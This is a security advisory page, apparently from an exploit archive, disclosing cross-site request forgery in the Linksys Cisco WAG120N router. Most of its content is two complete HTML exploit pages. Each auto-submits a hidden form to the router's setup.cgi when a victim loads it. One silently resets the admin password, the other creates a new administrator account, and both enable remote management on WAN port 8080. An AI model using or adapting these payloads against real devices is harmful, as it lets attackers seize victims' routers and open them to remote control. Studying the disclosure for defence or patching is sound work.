Linksys Cisco Wag120n Cross Site Request Forgery

2011.02.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

---------------------------------------------------------------- Hardware : Linksys Cisco Wag120n(And perhaps similar versions) Type of vunlnerability : CSRF ( Change Admin Password And Add User ) Risk of use : High ---------------------------------------------------------------- Producer Website : http://linksysbycisco.com ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- CSRF For Change Admin Password : #Use sysPasswd and sysConfirmPasswd to set new password <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/setup.cgi"; method="POST" name="form"> <input type="hidden" name="user_list" value="1"> <input type="hidden" name="h_user_list" value="1"> <input type="hidden" name="sysname" value="admin"> <input type="hidden" name="sysPasswd" value="password"> <input type="hidden" name="sysConfirmPasswd" value="password"> <input type="hidden" name="remote_management" value="enable"> <input type="hidden" name="http_wanport" value="8080"> <input type="hidden" name="upnp_enable" value="enable"> <input type="hidden" name="wlan_enable" value="enable"> <input type="hidden" name="igmp_proxy_enable" value="enable"> <input type="hidden" name="save" value="Save+Settings"> <input type="hidden" name="h_pwset" value="yes"> <input type="hidden" name="sysname_changed" value="yes"> <input type="hidden" name="pwchanged" value="yes"> <input type="hidden" name="pass_is_default" value="false"> <input type="hidden" name="h_remote_management" value="enable"> <input type="hidden" name="pass_is_none" value="no"> <input type="hidden" name="h_upnp_enable" value="enable"> <input type="hidden" name="h_wlan_enable" value="enable"> <input type="hidden" name="h_igmp_proxy_enable" value="enable"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Administration.htm"> <input type="hidden" name="next_file" value="Administration.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> </form> </body> </html> ---------------------------------------------------------------- CSRF For Add Administrator User: #Use sysPasswd and sysConfirmPasswd to set new password #if you add new user you should set pass_is_none=yes <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/setup.cgi"; method="POST" name="form"> <input type="hidden" name="user_list" value="2"> <input type="hidden" name="h_user_list" value="2"> <input type="hidden" name="sysname" value="ircrash"> <input type="hidden" name="sysPasswd" value="password"> <input type="hidden" name="sysConfirmPasswd" value="password"> <input type="hidden" name="remote_management" value="enable"> <input type="hidden" name="http_wanport" value="8080"> <input type="hidden" name="upnp_enable" value="enable"> <input type="hidden" name="wlan_enable" value="enable"> <input type="hidden" name="igmp_proxy_enable" value="enable"> <input type="hidden" name="save" value="Save+Settings"> <input type="hidden" name="h_pwset" value="yes"> <input type="hidden" name="sysname_changed" value="yes"> <input type="hidden" name="pwchanged" value="yes"> <input type="hidden" name="pass_is_default" value="false"> <input type="hidden" name="h_remote_management" value="enable"> <input type="hidden" name="pass_is_none" value="yes"> <input type="hidden" name="h_upnp_enable" value="enable"> <input type="hidden" name="h_wlan_enable" value="enable"> <input type="hidden" name="h_igmp_proxy_enable" value="enable"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Administration.htm"> <input type="hidden" name="next_file" value="Administration.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> </form> </body> </html> ----------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top